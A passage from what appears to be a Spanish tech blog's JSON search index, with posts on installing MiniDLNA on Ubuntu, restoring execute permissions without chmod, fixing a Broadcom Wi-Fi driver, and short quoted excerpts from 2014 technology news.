/usr/local/sbin/minidlnad -R -f ~/.minidlna/minidlna.conf Cortafuegos Deberemos asegurarnos de que el puerto que hayamos configurado, por defecto el 8200, sea accesible. También el puerto UDP 1900. Por ejemplo, si queremos permitir únicamente el acceso dentro de la propia LAN y usamos ufw:\n$ sudo ufw allow proto tcp from 192.168.50.0/24 to any port 8200 $ sudo ufw allow proto udp from 192.168.50.0/24 to any port 1900 Clientes En cualquier PC de escritorio, mediante VLC podemos reproducir el contenido servido a través de MiniDLNA. Basta que vayamos al menú Red local \u0026gt; Universal Plug\u0026rsquo;n\u0026rsquo;Play. De hecho, si tenemos los archivos de subtítulos en el servidor, también es capaz de incluirlos automáticamente.\nEn Android, la aplicación Media House nos permitirá reproducir el contenido.\nEjecución al inicio Si queremos que el servicio arranque al inicio, podemos utilizar el siguiente script:\n#!/bin/sh # Mini DLNA ### BEGIN INIT INFO # Provides: scriptname # Required-Start: $remote_fs $syslog # Required-Stop: $remote_fs $syslog # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: Start daemon at boot time # Description: Enable service provided by daemon. ### END INIT INFO case \u0026#34;$1\u0026#34; in \u0026#39;start\u0026#39;) /usr/local/sbin/minidlnad -f /home/user/.minidlna/minidlna.conf echo Started ;; \u0026#39;stop\u0026#39;) PID=`/bin/pidof minidlnad` if [ ${PID} ]; then sudo kill -SIGTERM ${PID} else echo Already Stopped fi ;; \u0026#39;restart\u0026#39;) PID=`/bin/pidof minidlnad` if [ ${PID} ]; then sudo kill -SIGTERM ${PID} fi /usr/local/sbin/minidlnad -f /home/user/.minidlna/minidlna.conf echo Restarted ;; \u0026#39;status\u0026#39;) PID=`/bin/pidof minidlnad` if [ ${PID} ]; then echo Running. Process ${PID} else echo Stopped fi ;; \u0026#39;rescan\u0026#39;) PID=`/bin/pidof minidlnad` if [ ${PID} ]; then sudo kill -SIGTERM ${PID} fi /usr/local/sbin/minidlnad -R -f /home/user/.minidlna/minidlna.conf echo Rescanning ;; *) echo \u0026#34;Usage: $0 { start | stop | restart | status | rescan }\u0026#34; ;; esac exit 0 Lo guardamos en /etc/init.d/minidlna y configuramos el arranque:\n$ sudo chmod +x /etc/init.d/minidlna $ sudo update-rc.d minidlna defaults Adding system startup for /etc/init.d/minidlna ... /etc/rc0.d/K20minidlna -\u0026gt; ../init.d/minidlna /etc/rc1.d/K20minidlna -\u0026gt; ../init.d/minidlna /etc/rc6.d/K20minidlna -\u0026gt; ../init.d/minidlna /etc/rc2.d/S20minidlna -\u0026gt; ../init.d/minidlna /etc/rc3.d/S20minidlna -\u0026gt; ../init.d/minidlna /etc/rc4.d/S20minidlna -\u0026gt; ../init.d/minidlna /etc/rc5.d/S20minidlna -\u0026gt; ../init.d/minidlna Actualizaciones Cuando haya actualizaciones del código, podemos repetir el proceso de compilación:\n$ cd minidlna-git $ make distclean $ git pull $ ./configure $ make $ sudo checkinstall Desinstalación Si queremos desinstalarlo, no tenemos más que:\n$ sudo aptitude purge minidlna $ sudo update-rc.d -f minidlna remove $ sudo rm /etc/init.d/minidlna $ sudo rm -r /home/user/.minidlna Referencias » Anand Subramanian | The Ultimate Guide to Compile and Install MiniDLNA on Ubuntu » Justin Maggard | MiniDLNA (ReadyMedia)\n","permalink":"http://karpoke.ignaciocano.com/2014/11/11/minidlna-en-ubuntu-trusty-tahr/","summary":"\u003cp\u003eDLNA define las especificaciones para compartir contenido multimedia\nentre diferentes dispositivos mediante el uso de protocolos UPnP.\nInstalaremos un servidor DLNA en Ubuntu Trusty Tahr, MiniDLNA (ahora se\nllama ReadyMedia), que nos permitirá, por ejemplo, ver películas,\nescuchar música o ver fotos en el portátil, el móvil o la televisión.\nActualmente, no se encuentra en los repositorios, así que lo\ninstalaremos a partir del código fuente. (Otra alternativa sería usar\nalgún repositorio PPA que ya contenga el paquete compilado.)\u003c/p\u003e","title":"MiniDLNA en Ubuntu Trusty Tahr"},{"content":"Durante la desventura de pasar de 32 a 64 bits, tuve el placer de quedarme sin poder ejecutar ningún binario, ya que estos se habían sobreescrito por sus versiones compiladas para la arquitectura de 64 bits mientras aún continuaba con la de 32.\nNi ls, ni rm, ni mv, ni cp, ni dpkg\u0026hellip; nada. Ni tampoco USB, ni ssh, y no podía reiniciar aún; un entorno idílico, vamos. El tema está en que, en un momento dado, necesité hacer uso de las versiones compiladas para 32 bits. Pude descargar aquellos binarios que necesitaba, pero no tenían permisos de ejecución y tampoco podía usar /bin/chmod. Por suerte, ya había alguien que se había imaginado un escenario sin chmod y había recopilado toda una serie de alternativas. Ésta es la que yo usé:\n$ /lib/ld-linux.so.2 ~/chmod +x ~/rm En 64 bits, el comando sería ligeramente diferente:\n$ /lib64/ld-linux-x86-64.so.2 /bin/chmod +x /bin/chmod ","permalink":"http://karpoke.ignaciocano.com/2014/11/08/chmod-sin-chmod/","summary":"\u003cp\u003eDurante la desventura de pasar de 32 a 64 bits, tuve el placer de quedarme sin\npoder ejecutar ningún binario, ya que estos se habían sobreescrito por sus\nversiones compiladas para la arquitectura de 64 bits mientras aún continuaba\ncon la de 32.\u003c/p\u003e\n\u003cp\u003eNi \u003ccode\u003els\u003c/code\u003e, ni \u003ccode\u003erm\u003c/code\u003e, ni \u003ccode\u003emv\u003c/code\u003e, ni \u003ccode\u003ecp\u003c/code\u003e, ni \u003ccode\u003edpkg\u003c/code\u003e\u0026hellip; nada. Ni tampoco USB, ni\n\u003ccode\u003essh\u003c/code\u003e, y no podía reiniciar aún; un entorno idílico, vamos. El tema está en\nque, en un momento dado, necesité hacer uso de las versiones compiladas para 32\nbits. Pude descargar aquellos binarios que necesitaba, pero no tenían permisos\nde ejecución y tampoco podía usar \u003ccode\u003e/bin/chmod\u003c/code\u003e. Por suerte, ya había alguien\nque se había imaginado un \u003ca href=\"http://www.slideshare.net/cog/chmod-x-chmod\"\u003eescenario sin \u003ccode\u003echmod\u003c/code\u003e\u003c/a\u003e y había\nrecopilado toda una serie de alternativas. Ésta es la que yo usé:\u003c/p\u003e","title":"chmod sin chmod"},{"content":" There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ’hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you’re a hacker.\n» Eric Steven Raymond | catb.org\n","permalink":"http://karpoke.ignaciocano.com/2014/11/08/how-to-become-a-hacker/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThere is a community, a shared culture, of expert programmers and\nnetworking wizards that traces its history back through decades to the\nfirst time-sharing minicomputers and the earliest ARPAnet experiments.\nThe members of this culture originated the term ’hacker’. Hackers\nbuilt the Internet. Hackers made the Unix operating system what it is\ntoday. Hackers make the World Wide Web work. If you are part of this\nculture, if you have contributed to it and other people in it know who\nyou are and call you a hacker, you’re a hacker.\u003c/p\u003e","title":"How To Become A Hacker"},{"content":"Al actualizar Ubuntu 14.04 de 32 a 64 bits, se eliminaron los controladores de la tarjeta de red inalámbrica. Reinstalar el controlador libre es sencillo. Antes que nada, necesitamos saber qué chipset tiene, el identificador y qué módulo carga el kernel (si es que tenemos algún controlador en uso):\n$ lspci -vvnn | grep -A 9 Network 04:00.0 Network controller [0280]: Broadcom Corporation BCM4312 802.11b/g LP-PHY [14e4:4315] (rev 01) Subsystem: Dell Wireless 1397 WLAN Mini-Card [1028:000c] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast \u0026gt;TAbort- SERR- Chipset: BCM4312 PCI ID: 14e4:4315 Controlador en uso: Ninguno (no aparece la línea que lo debería indicar) Instalamos el paquete necesario (si no tenemos conexión, deberemos conectarnos por cable o bien descargarlo desde otro equipo; más información en el enlace al final):\n$ sudo aptitude install firmware-b43-installer Al cabo de unos segundos, ya deberíamos poder usar la red inalámbrica.\ndeauthenticating from 00:00:00:11:22:33 by local (reason=3) Si nos encontramos con que no tenermina de conectar y en los logs aparece algo como:\n[ 123.456789] wlan0: deauthenticating from 00:00:00:11:22:33 by local choice (reason=3) podría ser debido a que el controlador que estábamos usando no se ha descargado correctamente. En principio, tras reiniciar ya no deberíamos tener este problema.\nReferencias » Community Help Wiki | WifiDocs/Driver/bcm43xx » b43 and b43legacy\n","permalink":"http://karpoke.ignaciocano.com/2014/11/07/instalar-el-controlador-libre-para-broadcom-bcm4312-en-ubuntu-trusty-thar/","summary":"\u003cp\u003eAl actualizar Ubuntu 14.04 de 32 a 64 bits, se eliminaron los\ncontroladores de la tarjeta de red inalámbrica. Reinstalar el\ncontrolador libre es sencillo. Antes que nada, necesitamos saber qué\nchipset tiene, el identificador y qué módulo carga el kernel (si es que\ntenemos algún controlador en uso):\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ lspci -vvnn | grep -A 9 Network\n04:00.0 Network controller [0280]: Broadcom Corporation BCM4312 802.11b/g LP-PHY [14e4:4315] (rev 01)\nSubsystem: Dell Wireless 1397 WLAN Mini-Card [1028:000c]\nControl: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-\nStatus: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast \u0026gt;TAbort- SERR-\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eChipset:\u003c/strong\u003e BCM4312\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePCI ID:\u003c/strong\u003e 14e4:4315\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eControlador en uso:\u003c/strong\u003e Ninguno (no aparece la línea que lo debería\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eindicar)\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eInstalamos el paquete necesario (si no tenemos conexión, deberemos\nconectarnos por cable o bien descargarlo desde otro equipo; más\ninformación en el enlace al final):\u003c/p\u003e","title":"Instalar el controlador libre para Broadcom BCM4312 en Ubuntu Trusty Thar"},{"content":" In the face of widespread Internet surveillance, we need a secure and practical means of talking to each other from our phones and computers. Many companies offer ”secure messaging” products”but are these systems actually secure? We decided to find out, in the first phase of a new EFF Campaign for Secure \u0026amp; Usable Crypto.\n» eff.org\n","permalink":"http://karpoke.ignaciocano.com/2014/11/07/secure-messaging-scorecard/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn the face of widespread Internet surveillance, we need a secure and\npractical means of talking to each other from our phones and\ncomputers. Many companies offer ”secure messaging” products”but are\nthese systems actually secure? We decided to find out, in the first\nphase of a new EFF Campaign for Secure \u0026amp; Usable Crypto.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"https://www.eff.org/secure-messaging-scorecard\"\u003eeff.org\u003c/a\u003e\u003c/p\u003e","title":"Secure messaging scorecard"},{"content":" El sistema truca las ondas electromagnéticas del monitor. De esta forma se puede transmitir información desde la pantalla a un teléfono que esté a menos de siete metros, con un ancho de banda de hasta 60 bytes por segundo, suficientes para obtener una contraseña en ocho segundos, según aseguran los investigadores.\n» Sergio Ferrer | elconfidencial.com\n","permalink":"http://karpoke.ignaciocano.com/2014/11/04/como-hackear-un-ordenador-con-la-radio-del-movil/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl sistema truca las ondas electromagnéticas del monitor. De esta\nforma se puede transmitir información desde la pantalla a un teléfono\nque esté a menos de siete metros, con un ancho de banda de hasta 60\nbytes por segundo, suficientes para obtener una contraseña en ocho\nsegundos, según aseguran los investigadores.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Sergio Ferrer | \u003ca href=\"http://www.elconfidencial.com/tecnologia/2014-11-03/como-hackear-un-ordenador-con-la-radio-del-movil_434775/\"\u003eelconfidencial.com\u003c/a\u003e\u003c/p\u003e","title":"Cómo ’hackear’ un ordenador con la radio del móvil"},{"content":" Computer Scientist Gary Kildall created just such an operating system in 1974 for a small computer called the ”Intellec-8ó that Intel had designed to showcase their new microprocessors. Called ”CP/M”, it was unlike most other operating systems for small computers because it was written in PL/M, a portable higher-level language that he had designed earlier, rather than in the assembly-language of a particular computer. That meant that CP/M could be ported to run on many different personal computers. And if the applications were written in PL/M, they could be ported as well.\n» David Laws | computerhistory.org\n","permalink":"http://karpoke.ignaciocano.com/2014/11/03/early-digital-research-cpm-source-code/","summary":"\u003cblockquote\u003e\n\u003cp\u003eComputer Scientist Gary Kildall created just such an operating system\nin 1974 for a small computer called the ”Intellec-8ó that Intel had\ndesigned to showcase their new microprocessors. Called ”CP/M”, it was\nunlike most other operating systems for small computers because it was\nwritten in PL/M, a portable higher-level language that he had designed\nearlier, rather than in the assembly-language of a particular\ncomputer. That meant that CP/M could be ported to run on many\ndifferent personal computers. And if the applications were written in\nPL/M, they could be ported as well.\u003c/p\u003e","title":"Early Digital Research CP/M Source Code"},{"content":" The goal for this research was to identify the most common problems and challenges that Android developers face with the devices they build for. The 288 unique Android device models represent a significant volume of Android use: approximately 92 to 97% of global Android volumes, depending on how it gets measured and what regions and markets are included. This research represents remarkable coverage of Android usage globally, and it shows the most obvious problems as well as the status of Android hardware and software from a developer’s point of view.\n» Ville-Veikko Helppi | smashingmagazine.com\n","permalink":"http://karpoke.ignaciocano.com/2014/11/02/what-every-app-developer-should-know-about-android/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe goal for this research was to identify the most common problems\nand challenges that Android developers face with the devices they\nbuild for. The 288 unique Android device models represent a\nsignificant volume of Android use: approximately 92 to 97% of global\nAndroid volumes, depending on how it gets measured and what regions\nand markets are included. This research represents remarkable coverage\nof Android usage globally, and it shows the most obvious problems as\nwell as the status of Android hardware and software from a developer’s\npoint of view.\u003c/p\u003e","title":"What Every App Developer Should Know About Android"},{"content":" Researchers at the security startup Shape Security say they’ve found a strain of malware on a client’s network that uses that new, furtive form of ”command and control””the communications channel that connects hackers to their malicious software”allowing them to send the programs updates and instructions and retrieve stolen data. Because the commands are hidden in unassuming Gmail drafts that are never even sent, the hidden communications channel is particularly difficult to detect.\n» Andy Greenberg | wired.com\n","permalink":"http://karpoke.ignaciocano.com/2014/10/29/hackers-are-using-gmail-drafts-to-update-their-malware-and-steal-data/","summary":"\u003cblockquote\u003e\n\u003cp\u003eResearchers at the security startup Shape Security say they’ve found a\nstrain of malware on a client’s network that uses that new, furtive\nform of ”command and control””the communications channel that connects\nhackers to their malicious software”allowing them to send the programs\nupdates and instructions and retrieve stolen data. Because the\ncommands are hidden in unassuming Gmail drafts that are never even\nsent, the hidden communications channel is particularly difficult to\ndetect.\u003c/p\u003e","title":"Hackers Are Using Gmail Drafts to Update Their Malware and Steal Data"},{"content":" Pues bien, se trata más bien de un ’side project’, es decir, el típico proyecto en el que te embarcas fuera de tu actividad principal, dedicándole o bien pasta o bien algo de tiempo. En mi caso han sido ambas cosas, pero es totalmente compatible con mis otros menesteres, como pegar los carteles de nvivo.es.\n» txantxez | txarly.com\n","permalink":"http://karpoke.ignaciocano.com/2014/10/26/como-lance-un-proyecto-rentable-sin-escribir-ni-una-linea-de-codigo/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePues bien, se trata más bien de un ’side project’, es decir, el típico\nproyecto en el que te embarcas fuera de tu actividad principal, dedicándole o\nbien pasta o bien algo de tiempo. En mi caso han sido ambas cosas, pero es\ntotalmente compatible con mis otros menesteres, como pegar los carteles de\nnvivo.es.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» txantxez | \u003ca href=\"http://www.txarly.com/post/100678426714/como-lance-un-proyecto-rentable-sin-escribir-ni-una\"\u003etxarly.com\u003c/a\u003e\u003c/p\u003e","title":"Cómo lancé un proyecto rentable sin escribir ni una línea de código"},{"content":" In case anyone’s wondering how I approached this as a programming problem, a quick trick is to not get drawn into writing a whole chessboard representation. Use a tool like pgn-extract to convert SAN moves (e.g. ”Nc3”) to long algebraic moves (e.g. ”Nb1c3”) - since we can safely assume all moves in the PGN are legal, this saves a lot of effort implementing the rules of chess (although you still have to handle castling and en passant carefully). » png-extract » SurvivingPieces\n» quora.com\n","permalink":"http://karpoke.ignaciocano.com/2014/10/26/what-are-the-chances-of-survival-of-individual-chess-pieces-in-average-games/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn case anyone’s wondering how I approached this as a programming\nproblem, a quick trick is to not get drawn into writing a whole\nchessboard representation. Use a tool like pgn-extract to convert SAN\nmoves (e.g. ”Nc3”) to long algebraic moves (e.g. ”Nb1c3”) - since we\ncan safely assume all moves in the PGN are legal, this saves a lot of\neffort implementing the rules of chess (although you still have to\nhandle castling and en passant carefully). » \u003ca href=\"http://www.cs.kent.ac.uk/people/staff/djb/pgn-extract/\"\u003epng-extract\u003c/a\u003e »\n\u003ca href=\"https://github.com/ojb500/SurvivingPieces\"\u003eSurvivingPieces\u003c/a\u003e\u003c/p\u003e","title":"What are the chances of survival of individual chess pieces in average games?"},{"content":" I’m putting a team of Debian developers together to work full time on a derivative distribution of Debian. The idea is to provide a high-quality regular release based on Debian unstable, ensuring that all patches are given back to Debian, and ensuring that the install disk of our distribution consists entirely of Free software. Martin and I spoke at length about the project and he seemed to like the idea very much. I’m sure he’d be happy to let you know his thoughts directly. If you’re interested I’d like to give you a call to discuss it further with you. I’m based in the UK so we’re roughly in the same timezone, just let me know when and what number to reach you on.\n» Scott James Remnant | netsplit.com\n","permalink":"http://karpoke.ignaciocano.com/2014/10/25/happy-10th-birthday-ubuntu/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI’m putting a team of Debian developers together to work full time on\na derivative distribution of Debian. The idea is to provide a\nhigh-quality regular release based on Debian unstable, ensuring that\nall patches are given back to Debian, and ensuring that the install\ndisk of our distribution consists entirely of Free software. Martin\nand I spoke at length about the project and he seemed to like the idea\nvery much. I’m sure he’d be happy to let you know his thoughts\ndirectly. If you’re interested I’d like to give you a call to discuss\nit further with you. I’m based in the UK so we’re roughly in the same\ntimezone, just let me know when and what number to reach you on.\u003c/p\u003e","title":"Happy 10th Birthday, Ubuntu"},{"content":" Las máquinas de vídeopóquer Game King llegaron a los casinos en 1970 y fueron un éxito inmediato. Con los años, su software se fue actualizando, incluyendo nuevos juegos y opciones. En 2002 lanzó su quinta gran actualización, que presumía de unos gráficos de calidad nunca vista antes en uno de estos aparatos, así como sonido en estéreo mejorado respecto a versiones anteriores. Lo que este programa incluía también, y nadie se dio cuenta, fueron una serie de sutiles errores de código que tardaron siete años en ser descubiertos.\n» Rocío P. Benavente | elconfidencial.com\n","permalink":"http://karpoke.ignaciocano.com/2014/10/09/aprovechan-un-fallo-y-le-sacan-980-000-dolares-a-varios-casinos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLas máquinas de vídeopóquer Game King llegaron a los casinos en 1970 y\nfueron un éxito inmediato. Con los años, su software se fue\nactualizando, incluyendo nuevos juegos y opciones. En 2002 lanzó su\nquinta gran actualización, que presumía de unos gráficos de calidad\nnunca vista antes en uno de estos aparatos, así como sonido en estéreo\nmejorado respecto a versiones anteriores. Lo que este programa incluía\ntambién, y nadie se dio cuenta, fueron una serie de sutiles errores de\ncódigo que tardaron siete años en ser descubiertos.\u003c/p\u003e","title":"Aprovechan un fallo y le sacan 980.000 dólares a varios casinos"},{"content":" Nick Holonyak Jr., the person widely credited with the development of the first visible-light LED, the device that now lights up countless clocks, traffic signals, and other electronic displays, might be one of them. On Tuesday, the Royal Swedish Academy of Sciences awarded this year’s Nobel Prize in Physics to three inventors of the blue light-emitting diode. Holonyak isn’t exactly complaining that he isn’t among them; his objection is that his 1962 invention has never been singled out for recognition by the academy.\n» Rachel Courtland | ieee.org\n","permalink":"http://karpoke.ignaciocano.com/2014/10/08/no-nobel-for-the-father-of-the-led/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNick Holonyak Jr., the person widely credited with the development of\nthe first visible-light LED, the device that now lights up countless\nclocks, traffic signals, and other electronic displays, might be one\nof them. On Tuesday, the Royal Swedish Academy of Sciences awarded\nthis year’s Nobel Prize in Physics to three inventors of the blue\nlight-emitting diode. Holonyak isn’t exactly complaining that he isn’t\namong them; his objection is that his 1962 invention has never been\nsingled out for recognition by the academy.\u003c/p\u003e","title":"No Nobel for the Father of the LED"},{"content":" DOS Lab IIT Madras and CDAC Chennai out of India are aiming to redesign the Linux kernel as MOOL, or the Minimalistic Object Oriented Linux. The project site explains, ”MOOL (Minimalistic Object Oriented Linux) aims at redesigning the Linux kernel to reduce coupling and increase maintainability by means of OO (Object Oriented) abstractions. Excessive common coupling prevails in existing kernel. Studies have shown that common coupling is increasing in successive versions of Linux. This will make maintainability of Linux difficult in coming years. As a starting step we have tried to reduce the number of global variables of the kernel. Some global variables are used only by two or three kernel modules. These are passed as function arguments. The performance of the modified kernel is measured with the standard performance analysis tools. The modified kernel performs almost same as original. MOOL features a device driver framework to write drivers in C++ and insert them as loadable kernel modules.”\n» Michael Larabel | phoronix.com\n","permalink":"http://karpoke.ignaciocano.com/2014/10/05/indian-developers-redesigning-linux-kernel-with-oop-c-support/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDOS Lab IIT Madras and CDAC Chennai out of India are aiming to\nredesign the Linux kernel as MOOL, or the Minimalistic Object Oriented\nLinux. The project site explains, ”MOOL (Minimalistic Object Oriented\nLinux) aims at redesigning the Linux kernel to reduce coupling and\nincrease maintainability by means of OO (Object Oriented)\nabstractions. Excessive common coupling prevails in existing kernel.\nStudies have shown that common coupling is increasing in successive\nversions of Linux. This will make maintainability of Linux difficult\nin coming years. As a starting step we have tried to reduce the number\nof global variables of the kernel. Some global variables are used only\nby two or three kernel modules. These are passed as function\narguments. The performance of the modified kernel is measured with the\nstandard performance analysis tools. The modified kernel performs\nalmost same as original. MOOL features a device driver framework to\nwrite drivers in C++ and insert them as loadable kernel modules.”\u003c/p\u003e","title":"Indian Developers Redesigning Linux Kernel With OOP, C++ Support"},{"content":" The problem we discussed is laid out in some detail in my Brain Drain post, but a quick summary is this: scientific research in many disciplines is becoming more and more dependent on the careful analysis of large datasets. This analysis requires a skill-set as broad as it is deep: scientists must be experts not only in their own domain, but in statistics, computing, algorithm building, and software design as well. Many researchers are working hard to attain these skills; the problem is that academia’s reward structure is not well-poised to reward the value of this type of work. In short, time spent developing high-quality reusable software tools translates to less time writing and publishing, which under the current system translates to little hope for academic career advancement. » Jake Vanderplas | The Big Data Brain Drain: Why Science is in Trouble\n» Jake Vanderplas | jakevdp.github.io\n","permalink":"http://karpoke.ignaciocano.com/2014/09/21/hacking-academia-data-science-and-the-university/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe problem we discussed is laid out in some detail in my Brain Drain\npost, but a quick summary is this: scientific research in many\ndisciplines is becoming more and more dependent on the careful\nanalysis of large datasets. This analysis requires a skill-set as\nbroad as it is deep: scientists must be experts not only in their own\ndomain, but in statistics, computing, algorithm building, and software\ndesign as well. Many researchers are working hard to attain these\nskills; the problem is that academia’s reward structure is not\nwell-poised to reward the value of this type of work. In short, time\nspent developing high-quality reusable software tools translates to\nless time writing and publishing, which under the current system\ntranslates to little hope for academic career advancement. » Jake\nVanderplas | \u003ca href=\"http://jakevdp.github.io/blog/2013/10/26/big-data-brain-drain/\"\u003eThe Big Data Brain Drain: Why Science is in Trouble\u003c/a\u003e\u003c/p\u003e","title":"Hacking Academia: Data Science and the University"},{"content":" Imgur user smellystring has officially changed my view of Minecraft – and he’ll change yours as well. Below is a fully functional 1KB hard drive, created within Minecraft and it’s incredible. Smellystring walks us through the process which includes binary blocks, pistons, a data collection room, indicator lights and ”bit” emulators. Watch and learn. » reddit.com » | imgur.com\n» Steven Norris | gearburn.com\n","permalink":"http://karpoke.ignaciocano.com/2014/09/21/savvy-imgur-user-builds-working-1kb-hard-drive-inside-vanilla-minecraft/","summary":"\u003cblockquote\u003e\n\u003cp\u003eImgur user smellystring has officially changed my view of Minecraft –\nand he’ll change yours as well. Below is a fully functional 1KB hard\ndrive, created within Minecraft and it’s incredible. Smellystring\nwalks us through the process which includes binary blocks, pistons, a\ndata collection room, indicator lights and ”bit” emulators. Watch and\nlearn. » \u003ca href=\"http://reddit.com/r/Minecraft/comments/2e0ghk/fully_functional_1kb_hard_drive_in_vanilla/\"\u003ereddit.com\u003c/a\u003e » | \u003ca href=\"http://imgur.com/a/NJBuH\"\u003eimgur.com\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Steven Norris | \u003ca href=\"http://gearburn.com/2014/08/savvy-imgur-user-builds-working-1kb-hard-drive-inside-vanilla-minecraft/\"\u003egearburn.com\u003c/a\u003e\u003c/p\u003e","title":"Savvy Imgur user builds working 1KB hard drive inside ’vanilla’ Minecraft"},{"content":" Running Doom on a printer is more than a gimmick: it’s a security concern. In 1993, first-person shooter Doom was a groundbreaking game. In 2014, it’s being used by ethical hackers to demonstrate security vulnerabilities in connected devices.\n» Tom Fox-Brewster | theguardian.com\n","permalink":"http://karpoke.ignaciocano.com/2014/09/20/hacker-puts-doom-on-a-printer-to-highlight-security-vulnerabilities/","summary":"\u003cblockquote\u003e\n\u003cp\u003eRunning Doom on a printer is more than a gimmick: it’s a security\nconcern. In 1993, first-person shooter Doom was a groundbreaking game.\nIn 2014, it’s being used by ethical hackers to demonstrate security\nvulnerabilities in connected devices.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Tom Fox-Brewster | \u003ca href=\"http://www.theguardian.com/technology/2014/sep/15/hackers-doom-printer-canon-security\"\u003etheguardian.com\u003c/a\u003e\u003c/p\u003e","title":"Hacker puts Doom on a printer to highlight security vulnerabilities"},{"content":" It’s not surprising that academics \u0026ndash; hell bent on taking the fun out of everything \u0026ndash; would hate our beloved and iconic movie version of them. But Canuto is no killjoy. His ironic tone and acerbic wit seem honed by long boring days in the sun. So I bite. I quickly learn that there’s a good reason why most every archeologist on Earth hates Indy. And that they might have a point. Because Jones isn’t an archeologist at all.\n» Erik Vance | lastwordonnothing.com\n","permalink":"http://karpoke.ignaciocano.com/2014/09/19/why-archeologists-hate-indiana-jones/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIt’s not surprising that academics \u0026ndash; hell bent on taking the fun out\nof everything \u0026ndash; would hate our beloved and iconic movie version of\nthem. But Canuto is no killjoy. His ironic tone and acerbic wit seem\nhoned by long boring days in the sun. So I bite. I quickly learn that\nthere’s a good reason why most every archeologist on Earth hates Indy.\nAnd that they might have a point. Because Jones isn’t an archeologist\nat all.\u003c/p\u003e","title":"Why Archeologists Hate Indiana Jones"},{"content":" Never has a tweet been more true, or potentially more disastrous for a vendor. Years ago Google’s Andy Rubin, stung by Steve Jobs’ criticism that Android wasn’t truly open, tweeted that anyone could fork - i.e., modify - Android, making it ”open” in the truest sense of the word. Unfortunately for Google, many OEMs took Rubin at his word. Today, Google’s Android business is booming, but it’s clear that Android fragmentation minimizes just how much Google—or its ecosystem of app developers—can make from the open-source mobile OS. Unfortunately, according to new ABI Research data, it’s only going to get worse.\n» Matt Asay | readwrite.com\n","permalink":"http://karpoke.ignaciocano.com/2014/09/14/googles-got-an-open-source-android-problem/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNever has a tweet been more true, or potentially more disastrous for a\nvendor. Years ago Google’s Andy Rubin, stung by Steve Jobs’ criticism that\nAndroid wasn’t truly open, tweeted that anyone could fork - i.e., modify -\nAndroid, making it ”open” in the truest sense of the word.  Unfortunately for\nGoogle, many OEMs took Rubin at his word. Today, Google’s Android business is\nbooming, but it’s clear that Android fragmentation minimizes just how much\nGoogle—or its ecosystem of app developers—can make from the open-source\nmobile OS. Unfortunately, according to new ABI Research data, it’s only going\nto get worse.\u003c/p\u003e","title":"Google’s Got an Open Source Android Problem"},{"content":" Over the years, I’ve had the pleasure of hacking on the frontend code for a bunch of xkcd’s interactive comics, including: unixkcd, xk3d, Umwelt, Time, Externalities, and Lorenz. This weekend, I was pinged about making something to coincide with the release of What If?: Serious Scientific Answers to Absurd Hypothetical Questions. The process of building ”Pixels” was even crazier than our usual April Fools rush, and had the extra intrigue of being live during Randall Munroe’s Colbert Report interview. Here’s a few anecdotes from the development of Pixels and a quick explanation of how it works. I hadn’t worked with some of the graphics programming patterns (coordinate systems!) for a while, so I ended up making some classic mistakes – hopefully you can avoid repeating them. :)\n» Max | chromakode.com\n\u0026#34;Notes from the development of xkcd\u0026#39;s \u0026#34;Pixels\u0026#34;\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2014/09/14/notes-from-the-development-of-xkcds-pixels/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOver the years, I’ve had the pleasure of hacking on the frontend code\nfor a bunch of xkcd’s interactive comics, including: unixkcd, xk3d,\nUmwelt, Time, Externalities, and Lorenz. This weekend, I was pinged\nabout making something to coincide with the release of What If?:\nSerious Scientific Answers to Absurd Hypothetical Questions. The\nprocess of building ”Pixels” was even crazier than our usual April\nFools rush, and had the extra intrigue of being live during Randall\nMunroe’s Colbert Report interview. Here’s a few anecdotes from the\ndevelopment of Pixels and a quick explanation of how it works. I\nhadn’t worked with some of the graphics programming patterns\n(coordinate systems!) for a while, so I ended up making some classic\nmistakes – hopefully you can avoid repeating them. :)\u003c/p\u003e","title":"Notes from the development of xkcd’s ”Pixels”"},{"content":" Andrey Kolmogorov, Fred Hennie, Richard Stearns, and Walter Savitch are all famous separately; but they have something in common. Read on, and see. Today I wish to discuss some algorithmic tricks and show that they were initially used by complexity theorists, years before they were used by algorithm designers. To steal a phrase: it`s computational complexity all the way down. Well not exactly. The situation is slightly more complex”a bad pun. The complexity 